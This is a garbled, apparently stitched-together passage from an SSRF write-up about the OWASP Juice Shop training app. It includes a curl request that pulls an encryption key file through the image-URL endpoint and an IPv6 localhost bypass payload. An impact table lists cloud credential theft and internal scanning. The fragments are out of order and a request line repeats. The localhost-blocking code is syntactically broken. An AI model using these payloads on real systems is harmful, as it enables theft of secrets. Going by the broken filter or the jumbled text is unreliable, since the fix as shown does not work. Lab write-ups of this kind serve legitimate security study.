curl "http://localhost:3000/api/Image?url=http://localhost:3000/encryptionkey.txt" HTTP 200 with the encryption key in the body (may be text/plain despite image content-type header). 5. Impact Assessment | Attack Vector | Impact | |---------------|--------| | Localhost file read | Exposure of source code, config files, secrets | | Internal port scan | Discovery of admin panels, databases, Redis, Jenkins | | Cloud metadata theft | IAM credentials, access tokens → cloud account compromise | | Service interaction (e.g., Redis, Memcached) | Potential RCE via protocol smuggling |
const isLocalhost = (url) => ; if (isLocalhost(url)) return res.status(400).send('Localhost requests blocked'); owasp juice shop ssrf
http://[::1]:3000/encryptionkey.txt
GET /api/Image?url=https://example.com/image.png HTTP/1.1 The server code (simplified) looks like: curl "http://localhost:3000/api/Image